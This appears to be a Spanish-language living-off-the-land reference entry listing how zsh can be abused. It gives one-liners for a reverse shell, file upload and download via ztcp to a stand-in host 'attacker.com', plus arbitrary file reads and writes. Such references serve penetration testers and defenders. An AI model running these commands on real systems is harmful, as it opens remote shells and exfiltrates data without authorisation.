./zsh --examples
Funciones y ejemplos de uso
download
zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n "$(<&$REPLY)" >/path/to/output-file'
file-read
zsh -c 'echo "$(</path/to/input-file)"'
zsh -c '</path/to/input-file'
file-write
zsh -c 'echo DATA >/path/to/output-file'
inherit
zsh -c '</etc/hosts'
reverse-shell
zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
shell
zsh
upload
zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n "$(</path/to/input-file)" >&$REPLY'
./related --binary=zsh
Binarios relacionados
Comparten al menos una función con zsh.